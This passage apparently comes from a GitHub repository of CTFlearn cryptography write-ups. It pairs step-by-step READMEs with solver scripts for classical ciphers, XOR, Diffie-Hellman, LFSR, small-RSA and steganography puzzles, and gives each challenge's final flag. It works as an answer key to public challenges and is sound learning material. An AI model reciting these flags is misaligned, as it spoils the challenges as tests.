--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/4.png

--------------------------------------------------------------------------------
/Cryptography/3's or 16's? Don't Ask Me!/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/5.png

--------------------------------------------------------------------------------
/Cryptography/3's or 16's? Don't Ask Me!/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/Flag.png

--------------------------------------------------------------------------------
/Cryptography/5x5 Crypto/Flag.py:
--------------------------------------------------------------------------------
import numpy as np

arr = np.arange(65,90).reshape(5, 5) # Array of alphabet
arr = np.where(arr <75, arr, arr+1) # Array without 'K'

cells = ["1-3","4-4","2-1","{","4-4","2-3","4-5","3-2","1-2","4-3","_","4-5","3-5","}"]
for i in cells:
    if(ord(i[0])>=48 and ord(i[0])<=57):
        x=int(i[0])-1
        y=int(i[2])-1
        print(chr(arr[x][y]),end="")
    else:
        print(i[0],end="")
print("\n")

--------------------------------------------------------------------------------
/Cryptography/5x5 Crypto/README.md:
--------------------------------------------------------------------------------
## 5x5 Crypto
The main idea of finding the flag is using simple pairs.

#### Step-1:
After reading the given text:

`Ever heard of the 5x5 secret message system? If not, basically it's a 5x5 grid with all letters of the alphabet in order, without k because c is represented to make the k sound only. Google it if you need to. A letter is identified by Row-Column. All values are in caps. Try: 1-3,4-4,2-1,{,4-4,2-3,4-5,3-2,1-2,4-3,_,4-5,3-5,}`

#### Step-2:
So, basically the table is:



We can decode the message according to the inputs given in the message above to get the flag.

#### Step-3:
Instead, I wrote a `Flag.py` script to get the flag.

```py
import numpy as np

arr = np.arange(65,90).reshape(5, 5) # Array of alphabet
arr = np.where(arr <75, arr, arr+1) # Array without 'K'

cells = ["1-3","4-4","2-1","{","4-4","2-3","4-5","3-2","1-2","4-3","_","4-5","3-5","}"]
for i in cells:
    if(ord(i[0])>=48 and ord(i[0])<=57):
        x=int(i[0])-1
        y=int(i[2])-1
        print(chr(arr[x][y]),end="")
    else:
        print(i[0],end="")
print("\n")
```

#### Step-4:

If we execute this script with `python3 Flag.py`, we get the following output:

```bash
CTF{THUMBS_UP}
```
#### Step-5:

Finally the flag becomes:
`CTF{THUMBS_UP}`

--------------------------------------------------------------------------------
/Cryptography/5x5 Crypto/Table.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/5x5 Crypto/Table.png

--------------------------------------------------------------------------------
/Cryptography/ALEXCTF CR2: Many time secrets/README.md:
--------------------------------------------------------------------------------
## ALEXCTF CR2: Many time secrets
The main idea of finding the flag is decomposing the hex dump and finding the public key.

#### Step-1:
After we download `msg(4)` from the cloud, we get the following data.

`0529242a631234122d2b36697f13272c207f2021283a6b0c79082f28202a302029142c653f3c7f2a2636273e3f2d653e25217908322921780c3a235b3c2c3f207f372e21733a3a2b37263b3130122f6c363b2b312b1e64651b6537222e37377f2020242b6b2c2d5d283f652c2b31661426292b653a292c372a2f20212a316b283c0929232178373c270f682c216532263b2d3632353c2c3c2a293504613c37373531285b3c2a72273a67212a277f373a243c20203d5d
243a202a633d205b3c2d3765342236653a2c7423202f3f652a182239373d6f740a1e3c651f207f2c212a247f3d2e65262430791c263e203d63232f0f20653f207f332065262c31683137223679182f2f372133202f142665212637222220733e383f2426386b`

Working out:
https://youtu.be/p4DIab6NKOY?t=307

The link for this tool is below:
https://github.com/SpiderLabs/cribdrag

#### Step-2:

I didn't have a complete idea of how to proceed on this challenge, so I took help from online sources and got this.

https://youtu.be/p4DIab6NKOY?t=307

#### Step-3:
Alternatively, the same flag can be approached in another way.

https://www.embeddedhacker.com/2020/01/hacking-walkthrough-ctflearn-crypto-medium/

#### Step-4:
Finally the flag becomes:
`ALEXCTF{HERE_GOES_THE_KEY}`

--------------------------------------------------------------------------------
/Cryptography/ALEXCTF CR2: Many time secrets/msg (4):
--------------------------------------------------------------------------------
0529242a631234122d2b36697f13272c207f2021283a6b0c7908
2f28202a302029142c653f3c7f2a2636273e3f2d653e25217908
322921780c3a235b3c2c3f207f372e21733a3a2b37263b313012
2f6c363b2b312b1e64651b6537222e37377f2020242b6b2c2d5d
283f652c2b31661426292b653a292c372a2f20212a316b283c09
29232178373c270f682c216532263b2d3632353c2c3c2a293504
613c37373531285b3c2a72273a67212a277f373a243c20203d5d
243a202a633d205b3c2d3765342236653a2c7423202f3f652a18
2239373d6f740a1e3c651f207f2c212a247f3d2e65262430791c
263e203d63232f0f20653f207f332065262c3168313722367918
2f2f372133202f142665212637222220733e383f2426386b

--------------------------------------------------------------------------------
/Cryptography/Base 2 2 the 6/Decode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Base 2 2 the 6/Decode.png

--------------------------------------------------------------------------------
/Cryptography/Base 2 2 the 6/README.md:
--------------------------------------------------------------------------------
## Base 2 2 the 6
The main idea for finding the flag is that $2^6$ = 64.

#### Step-1:
After we read the message given,

`Q1RGe0ZsYWdneVdhZ2d5UmFnZ3l9`

It is clearly Base64 encoded.

#### Step-2:
I tried to decode it online here: https://www.base64decode.org/

I got the following result:

#### Step-3:
Finally the flag becomes:
`CTF{FlaggyWaggyRaggy}`

--------------------------------------------------------------------------------
/Cryptography/BruXOR/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/BruXOR/Flag.png

--------------------------------------------------------------------------------
/Cryptography/BruXOR/Input.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/BruXOR/Input.png

--------------------------------------------------------------------------------
/Cryptography/BruXOR/README.md:
--------------------------------------------------------------------------------
## BruXOR
The main idea for finding the flag is XOR brute force.

#### Step-1:
After reading the message in the question,

`There is a technique called bruteforce. Message: q{vpln'bH_varHuebcrqxetrHOXEj No key! Just brute .. brute .. brute ... :D`

The first thing I searched online was XOR Bruteforce and I got some helpful results.

#### Step-2:
I followed the URL: https://www.dcode.fr/xor-cipher

Since the message clearly says that there is no key, my inputs were as follows (only brute force xP):

#### Step-3:
After decrypting, we get the following results, amidst which I found the flag.
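
The brute force that the online tool performs in Step-3 can be reproduced offline. This is an added example, not part of the original write-up: it tries all 256 single-byte keys on the challenge ciphertext, ranks the candidates, and also shows the known-prefix shortcut. The scoring alphabet and the function names are assumptions chosen for this illustration.

```python
import string

# Ciphertext exactly as quoted in the challenge text above.
CIPHERTEXT = b"q{vpln'bH_varHuebcrqxetrHOXEj"

# Bytes expected in a CTF flag: letters, digits, space and "_{}" (an assumption).
FLAG_ALPHABET = frozenset((string.ascii_letters + string.digits + " _{}").encode())


def xor_single(data: bytes, key: int) -> bytes:
    """XOR every byte of `data` with the same one-byte key."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> int:
    """Number of bytes that fall inside the expected flag alphabet."""
    return sum(b in FLAG_ALPHABET for b in candidate)


def brute_force(ciphertext: bytes, keep: int = 5):
    """Try all 256 keys; return the `keep` best (score, key, plaintext) tuples."""
    ranked = []
    for key in range(256):
        plain = xor_single(ciphertext, key)
        ranked.append((score(plain), key, plain))
    # Highest score first; ties keep ascending key order (sort is stable).
    ranked.sort(key=lambda item: item[0], reverse=True)
    return ranked[:keep]


def key_from_known_prefix(ciphertext: bytes, prefix: bytes):
    """Known-plaintext shortcut: every prefix byte must imply the same key."""
    if len(prefix) == 0 or len(prefix) > len(ciphertext):
        return None
    keys = {c ^ p for c, p in zip(ciphertext, prefix)}
    return keys.pop() if len(keys) == 1 else None


if __name__ == "__main__":
    for points, key, plain in brute_force(CIPHERTEXT):
        print(f"key=0x{key:02x} score={points:2d} {plain!r}")
    print("key from prefix 'flag{':", key_from_known_prefix(CIPHERTEXT, b"flag{"))
```

Only one key maps every ciphertext byte into the flag alphabet, which is why a single repeated key byte offers no confidentiality: the key space is 256 and any recognisable structure in the plaintext identifies the right candidate.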

#### Step-4:
Finally the flag becomes:
`flag{y0u_Have_bruteforce_XOR}`

--------------------------------------------------------------------------------
/Cryptography/Character Encoding/README.md:
--------------------------------------------------------------------------------
## Character Encoding
The main idea for finding the flag is a simple hex-to-text conversion.

#### Step-1:
Generally, I don't criticize any challenge, but this one crossed limits. It was too Ez. xP.

We have been given simple hex code: `41 42 43 54 46 7B 34 35 43 31 31 5F 31 35 5F 55 35 33 46 55 4C 7D`

#### Step-2:
Convert it online here to text:
http://www.unit-conversion.info/texttools/hexadecimal/

#### Step-3:

Finally the flag becomes:
`ABCTF{45C11_15_U53FUL}`

--------------------------------------------------------------------------------
/Cryptography/Defying Hell/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Defying Hell/Flag.png

--------------------------------------------------------------------------------
/Cryptography/Defying Hell/data.txt:
--------------------------------------------------------------------------------
p: 0x8c5378994ef1b
g: 0x02

A: 0x269beb3b0e968
B: 0x4757336da6f70

--------------------------------------------------------------------------------
/Cryptography/Defying Hell/exploit.py:
--------------------------------------------------------------------------------
from sympy.ntheory.residue_ntheory import discrete_log

p = 2468642135797531
g = 2

# A = g^{a} mod p where a is the secret integer of Alice
A = 679217732839784
# B = g^{b} mod p where b is the secret integer of Bob
B = 1255037608816496

# Find integers a and b in [1, p-1] s.t. g^{a} = A mod p and g^{b} = B mod p.
# Note that the complexity of this computation is exponential as it is the discrete logarithm problem.
a = int(discrete_log(p, A, g))
b = int(discrete_log(p, B, g))

# Make sure the recovered exponents really reproduce the public values
assert pow(g, a, p) == A
assert pow(g, b, p) == B

# Compute the secret common key to verify correct keys
k_a = pow(B, a, p)
k_b = pow(A, b, p)
# Note that k = k_a = k_b
assert k_a == k_b
k = k_a

# Convert the exponents to bytes (works for any hex length, odd or even)
fa_bytes = a.to_bytes((a.bit_length() + 7) // 8, "big")
fb_bytes = b.to_bytes((b.bit_length() + 7) // 8, "big")

print("a's secret key is: ", fa_bytes)
print("b's secret key is: ", fb_bytes)
print("Flag: CTFlearn{" + fa_bytes.decode() + "_" + fb_bytes.decode() + "}")

--------------------------------------------------------------------------------
/Cryptography/Encryption Master/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Encryption Master/1.png

--------------------------------------------------------------------------------
/Cryptography/Encryption Master/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Encryption Master/2.png

--------------------------------------------------------------------------------
/Cryptography/Encryption Master/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Encryption Master/3.png

--------------------------------------------------------------------------------
/Cryptography/Encryption Master/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Encryption Master/Flag.png

--------------------------------------------------------------------------------
/Cryptography/Encryption Master/Here ya go!.txt:
--------------------------------------------------------------------------------
This is NOT going to be fun.

--------------------------------------------------------------------------------
/Cryptography/Hextroadinary/README.md:
--------------------------------------------------------------------------------
## Hextroadinary

The main idea for finding the flag is to read the question properly and interpret it.

#### Step-1:

After we read the given message:

`Meet ROXy, a coder obsessed with being exclusively the worlds best hacker. She specializes in short cryptic hard to decipher secret codes. The below hex values for example, she did something with them to generate a secret code, can you figure out what? Your answer should start with 0x.`

`0xc4115` `0x4cf8`

#### Step-2:

`Meet ROXy` - This should give us a simple idea that we have to XOR the 2 given hex numbers.

#### Step-3:

So I tried it online here:

http://xor.pw/#

Note: Do not forget `0x` before flag.

#### Step-4:
Finally the flag becomes:
`CTFlearn{0xc0ded}`

--------------------------------------------------------------------------------
/Cryptography/Hextroadinary/xor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Hextroadinary/xor.png

--------------------------------------------------------------------------------
/Cryptography/HyperStream Test #2/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/HyperStream Test #2/Flag.png

--------------------------------------------------------------------------------
/Cryptography/HyperStream Test #2/README.md:
--------------------------------------------------------------------------------
## HyperStream Test #2
The main idea for finding the flag is to know the Baconian cipher.

#### Step-1:
After reading the challenge properly,

```
I love the smell of bacon in the morning!

ABAAAABABAABBABBAABBAABAAAAAABAAAAAAAABAABBABABBAAAAABBABBABABBAABAABABABBAABBABBAABB
```

#### Step-2:
It is clear that it has to be the Baconian cipher. Those who are unaware of it can refer here:
https://en.wikipedia.org/wiki/Bacon%27s_cipher

I then quickly looked for online Baconian cipher decoders.

#### Step-3:
I followed URL: https://www.dcode.fr/bacon-cipher.

I got the following results:

#### Step-4:
Finally the flag becomes:
`ILOUEBACONDONTYOU`

--------------------------------------------------------------------------------
/Cryptography/Image Editing/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Image Editing/Flag.png

--------------------------------------------------------------------------------
/Cryptography/Image Editing/README.md:
--------------------------------------------------------------------------------
## Image Editing
The main idea for finding the flag is analyzing the image with steganography tools.

#### Step-1:
After we download `final.png` from the cloud, we see the following:

#### Step-2:
We proceed by putting it through the Stegsolve tool ([here](https://wiki.bi0s.in/steganography/stegsolve/)).

#### Step-3:
We choose the options based on what zsteg returns for that image, `b1`, `r`, `lsb`, `xy` (`b1` for the byte, `r` for the red color, `lsb` for the algorithm, `xy` for the position in the image), and extract the data there.

#### Step-4:
We save that data in `.png` format because, looking at the text of the hex dump, PNG is the first thing visible.

#### Step-5:
We then just run the command `zsteg .png` ([reference](https://wiki.bi0s.in/steganography/zsteg/)) to get the final flag as follows:

#### Step-6:
Finally the flag becomes:
`CTFlearn{1_kn3W_tH3_r3D_w4s_0ff}`

--------------------------------------------------------------------------------
/Cryptography/Image Editing/exploit.py:
--------------------------------------------------------------------------------
import numpy as np
import cv2

# OpenCV loads images as BGR, so channel index 2 is the red channel
df = cv2.imread('final.png')

# Keep the least significant bit of every red value and pack the bits into bytes
df = np.mod(df[:, :, 2], 2)
with open('half.png', 'wb') as f:
    f.write(bytes(np.packbits(df)))

# The extracted file is itself a PNG; repeat the same extraction on it
df = cv2.imread('half.png')
df = np.mod(df[:, :, 2], 2)
print(bytes(np.packbits(df)))

--------------------------------------------------------------------------------
/Cryptography/Image Editing/final.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Image Editing/final.png

--------------------------------------------------------------------------------
/Cryptography/Image Editing/half.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Image Editing/half.png

--------------------------------------------------------------------------------
/Cryptography/Image Editing/stegsolve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Image Editing/stegsolve.png

--------------------------------------------------------------------------------
/Cryptography/Linear-feedback. Shift. Register/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Linear-feedback. Shift. Register/Flag.png

--------------------------------------------------------------------------------
/Cryptography/Linear-feedback. Shift. Register/PRNG.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Linear-feedback. Shift. Register/PRNG.zip

--------------------------------------------------------------------------------
/Cryptography/Linear-feedback. Shift. Register/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Linear-feedback. Shift. Register/description.png

--------------------------------------------------------------------------------
/Cryptography/Linear-feedback. Shift. Register/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

def msb(num, pos):
    # XOR of the tap bits of num; this becomes the new most significant bit
    ret = (num & (1 << pos[0])) >> pos[0]

    for p in pos[1:]:
        ret ^= (num & (1 << p)) >> p
    return ret

def get_next(last, pos):
    # Shift the 8-bit register right by one and insert the feedback bit on top
    m = msb(last, pos)
    return (m << 7)|(last >> 1)

def decode():
    msb_pos = [6,5,3,2,0]
    # Known plaintext XOR ciphertext gives the keystream byte (register state)
    # at the last position of the known prefix
    last = prefix[-1] ^ cipher[len(prefix)-1]

    output=''
    for i in range(len(prefix), len(cipher)):
        last = get_next(last, msb_pos)
        output += chr(cipher[i] ^ last)

    print(prefix+output.encode())

cipher = open('secretMessage.hex', 'rb').read()
prefix = b"CTFlearn{"

decode()

--------------------------------------------------------------------------------
/Cryptography/Linear-feedback. Shift. Register/secretMessage.hex:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Linear-feedback. Shift. Register/secretMessage.hex

--------------------------------------------------------------------------------
/Cryptography/Modern Gaius Julius Caesar/README.md:
--------------------------------------------------------------------------------
## Modern Gaius Julius Caesar
The main idea for finding the flag is to observe the keyboard properly.

#### Step-1:
We are given this text `BUH'tdy,|Bim5y~Bdt76yQ`.

Description:
```
One of the easiest and earliest known ciphers but with XXI century twist! Nobody uses
Alphabet nowadays right? Why should you when you have your keyboard?
```

#### Step-2:
Clearly, the first letters of the decrypted message have to be `CTF...`

#### Step-3:
So, I observed the pattern and found that to decrypt the given message we have to go 2 keys left on a standard English QWERTY keyboard.

Therefore, `BUH'tdy,|Bim5y~Bdt76yQ` = `CTFlearn{Cyb3r_Cae54r}`

#### Step-4:
Finally, the flag becomes:
`CTFlearn{Cyb3r_Cae54r}`

--------------------------------------------------------------------------------
/Cryptography/Morse Code/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Morse Code/Flag.png

--------------------------------------------------------------------------------
/Cryptography/Morse Code/README.md:
--------------------------------------------------------------------------------
## Morse Code
The main idea for finding the flag is just knowing Morse code.

#### Step-1:

This is the message given to us:

`..-. .-.. .- --. ... .- -- ..- . .-.. -- --- .-. ... . .. ... -.-. --- --- .-.. -... -.-- - .... . .-- .- -.-- .. .-.. .. -.- . -.-. .... . . ...`

#### Step-2:
I used this URL to decode our answer:
https://cryptii.com/pipes/morse-code-to-text

#### Step-3:
This was my output:

That's it. That's our flag.

#### Step-4:

Finally the flag becomes:
`flagsamuelmorseiscoolbythewayilikechees`

--------------------------------------------------------------------------------
/Cryptography/Nasty Little Doctorses!/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Nasty Little Doctorses!/Flag.png

--------------------------------------------------------------------------------
/Cryptography/Nasty Little Doctorses!/README.md:
--------------------------------------------------------------------------------
## Nasty Little Doctorses!
The main idea for finding the flag is a simple Google search.

#### Step-1:
After I read the hash: `bafa3de6dac066cebe8c0e5670d98935`, I tried to decrypt it using an MD5 hash database.
But it turns out it was a reverse hash. What to do now?

#### Step-2:
For random results to follow up on, I searched on Google and luckily got the flag in the top results.

https://md5.gromweb.com/?string=CTF%7BMD5_is_Nasty%7D

###### Dunno, why this challenge was in Hard?

#### Step-3:
Finally the flag becomes:
`CTF{MD5_is_Nasty}`

--------------------------------------------------------------------------------
/Cryptography/RSA Beginner/Flag.py:
--------------------------------------------------------------------------------
import gmpy2
from gmpy2 import mpz

e = mpz(3)
c = mpz(219878849218803628752496734037301843801487889344508611639028)
n = mpz(245841236512478852752909734912575581815967630033049838269083)

# use factordb
q = mpz(416064700201658306196320137931)
p = mpz(590872612825179551336102196593)

phi = gmpy2.mul(p - 1, q - 1)   # Euler's totient of n = p * q
d = gmpy2.invert(e, phi)        # private exponent: d = e^-1 mod phi
f = gmpy2.powmod(c, d, n)       # plaintext as an integer: c^d mod n
g = bytes.fromhex(hex(f)[2:])   # integer -> bytes

print("[+] Flag is : ",g)

--------------------------------------------------------------------------------
/Cryptography/RSA Beginner/README.md:
--------------------------------------------------------------------------------
## RSA Beginner
The main idea for finding the flag is using the RSA function and its operations.

#### Step-1:
After we download `rsa (1).txt` from the cloud, we try to understand its contents.

If anyone is unaware of RSA encryption, they can check it out here:

https://en.wikipedia.org/wiki/RSA_(cryptosystem)

#### Step-2:
The contents of `rsa (1).txt` are as follows:

```
e: 3
c: 219878849218803628752496734037301843801487889344508611639028
n: 245841236512478852752909734912575581815967630033049838269083
```

#### Step-3:
We run a simple `Flag.py` script to get the flag.

```py
import gmpy2
from gmpy2 import mpz

e = mpz(3)
c = mpz(219878849218803628752496734037301843801487889344508611639028)
n = mpz(245841236512478852752909734912575581815967630033049838269083)

# use factordb
q = mpz(416064700201658306196320137931)
p = mpz(590872612825179551336102196593)

phi = gmpy2.mul(p - 1, q - 1)   # Euler's totient of n = p * q
d = gmpy2.invert(e, phi)        # private exponent: d = e^-1 mod phi
f = gmpy2.powmod(c, d, n)       # plaintext as an integer: c^d mod n
g = bytes.fromhex(hex(f)[2:])   # integer -> bytes

print("[+] Flag is : ",g)
```

#### Step-4:
The output of `python3 Flag.py` is as follows:

`[+] Flag is : b'abctf{rs4_is_aw3s0m3}'`

#### Step-5:
Finally the flag becomes:
`abctf{rs4_is_aw3s0m3}`

--------------------------------------------------------------------------------
/Cryptography/RSA Beginner/rsa (1).txt:
--------------------------------------------------------------------------------
e: 3
c: 219878849218803628752496734037301843801487889344508611639028
n: 245841236512478852752909734912575581815967630033049838269083

--------------------------------------------------------------------------------
/Cryptography/RSA Noob/Factorize.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/RSA Noob/Factorize.png

--------------------------------------------------------------------------------
/Cryptography/RSA Noob/Flag.py:
--------------------------------------------------------------------------------
from Crypto.Util.number import inverse
import binascii

e = 1
c = 9327565722767258308650643213344542404592011161659991421
n = 245841236512478852752909734912575581815967630033049838269083

# From factordb

p = 416064700201658306196320137931
q = 590872612825179551336102196593

phi = (p-1) * (q-1)

# With e = 1 the inverse is d = 1, so m = c mod n: the "ciphertext" is the plaintext
d = inverse(e,phi)
m = pow(c,d,n)

hex_str = hex(m)[2:] # Removing '0x'
print(binascii.unhexlify(hex_str))

--------------------------------------------------------------------------------
/Cryptography/RSA Noob/rsanoob (1).txt:
--------------------------------------------------------------------------------
e: 1
c: 9327565722767258308650643213344542404592011161659991421
n: 245841236512478852752909734912575581815967630033049838269083

--------------------------------------------------------------------------------
/Cryptography/Reverse Polarity/Covert.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Reverse Polarity/Covert.png

--------------------------------------------------------------------------------
/Cryptography/Reverse Polarity/README.md:
--------------------------------------------------------------------------------
## Reverse Polarity
The main idea for finding the flag is binary to ASCII conversion.

#### Step-1:
After seeing the text, we get the following:
`I got a new hard drive just to hold my flag, but I'm afraid that it rotted. What do I do? The only thing I could get off of it was this: `

```
01000011010101000100011001111011010000100110100101110100010111110100011001101100011010010111000001110000011010010110111001111101
```

I tried to convert the given binary text to ASCII.

#### Step-2:
I followed the URL: https://www.convertbinary.com/to-text/

I got the following result:

Voila, we have it.
#### Step-3:

Finally the flag becomes:
`CTF{Bit_Flippin}`

--------------------------------------------------------------------------------
/Cryptography/Skynet Is (Almost) Taking Over/README.md:
--------------------------------------------------------------------------------
## Skynet Is (Almost) Taking Over

#### Step-1:
This is the most elegant solution I could find.

https://mikelgarcialarragan.blogspot.com/2018/08/criptografia-cix-solucion-reto-ctflearn.html

#### Step-2:
Finally, the flag becomes:
`flag {will_he_be_back}`

--------------------------------------------------------------------------------
/Cryptography/Skynet Is (Almost) Taking Over/Skynet.txt:
--------------------------------------------------------------------------------
e: 65537

c1: 5024836662627906750454817701922271080214720765897113783786369197810770999608528443597447448508876214100063962982376037712548944474807897847869334582773452689962992522987755069402952836848501053684233233850594080254869
n1: 10603199174122839808738169357706062732533966731323858892743816728206914395320609331466257631096646511986506501272036007668358071304364156150345138983648630874220488837685118753574424686204595981514561343227316297317899

c2: 130884437483098301339042672379318680582507704056215246672305503902799253294397268030727540524911640778691710963573363763216872030631281953772411963153320471648783848323158455504315739311667392161460121273259241311534
n2: 5613358668671613665566510382994441407219432062998832523305840186970780370368271618683122274081615792349154210168307159475914213081021759597948038689876676892007399580995868266543309872185843728429426430822156211839073

c3: 40136988332296795741662524458025734893351353026652568277369126873536130787573840288544348201399567767278683800132245661707440297299339161485942455489387697524794283615358478900857853907316854396647838513117062760230880
n3: 43197226819995414250880489055413585390503681019180594772781599842207471693041753129885439403306011423063922105541557658194092177558145184151460920732675652134876335722840331008185551706229533179802997366680787866083523

--------------------------------------------------------------------------------
/Cryptography/So many 64s/README.md:
--------------------------------------------------------------------------------
## So many 64s
The main idea for finding the flag is Base64 decoding.

#### Step-1:
After I downloaded `flag.txt`, I got a humongous Base64-encoded message.

#### Step-2:
So, when I tried to decode it online, it gave a huge encoded text again. So, I had to write a script to get the flag.

#### Step-3:
The `exploit.py` has the script.

```python
import base64

with open('flag.txt', 'r') as f:
    text = f.read()

# Each decode yields another Base64 layer; stop at the first layer that looks like a flag
while 1:
    text = base64.b64decode(text).decode('utf-8')

    if '{' in text:
        print(text)
        #continue
        break
```

#### Step-4:

So finally, when I ran the script by `python3 exploit.py`, I got the flag.

#### Step-5:
Finally the flag becomes:
`ABCTF{pr3tty_b4s1c_r1ght?}`

--------------------------------------------------------------------------------
/Cryptography/So many 64s/exploit.py:
--------------------------------------------------------------------------------
import base64

with open('flag.txt', 'r') as f:
    text = f.read()

# Each decode yields another Base64 layer; stop at the first layer that looks like a flag
while 1:
    text = base64.b64decode(text).decode('utf-8')

    if '{' in text:
        print(text)
        #continue
        break

--------------------------------------------------------------------------------
/Cryptography/Substitution Cipher/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Substitution Cipher/Flag.png

--------------------------------------------------------------------------------
/Cryptography/Substitution Cipher/Input.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Substitution Cipher/Input.png

--------------------------------------------------------------------------------
/Cryptography/Suspecious message/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Suspecious message/Flag.png

--------------------------------------------------------------------------------
/Cryptography/Suspecious message/README.md:
--------------------------------------------------------------------------------
## Suspecious message
The main idea for finding the flag is to use the Playfair cipher.

#### Step-1:
We are given `photo.png` and a message `MQDzqdor{Ix4Oa41W_1F_B00h_m1YlqPpPP}`. We know that the flag format has to be CTFlearn{} and so I got the idea from `photo.png`.

#### Step-2:
Immediately, I tried the Playfair cipher at:
http://rumkin.com/tools/cipher/playfair.php

#### Step-3:
I used the given parameters and got the flag.

The end of the flag seemed a bit obfuscated, so I replaced all the P with R.

#### Step-4:
Finally, the flag becomes:
`CTFlearn{Pl4Yf41R_1S_C00l_c1PheRrRR}`

--------------------------------------------------------------------------------
/Cryptography/Suspecious message/photo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Suspecious message/photo.png

--------------------------------------------------------------------------------
/Cryptography/Symbolic Decimals/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/Symbolic Decimals/Flag.png

--------------------------------------------------------------------------------
/Cryptography/Symbolic Decimals/README.md:
--------------------------------------------------------------------------------
## Symbolic Decimals
The main idea for finding the flag is simple cryptographic knowledge.

#### Step-1:
After I read the given message:

```
Did you know that you can hide messages with symbols? For example,
!@#$%^&*( is 123456789!
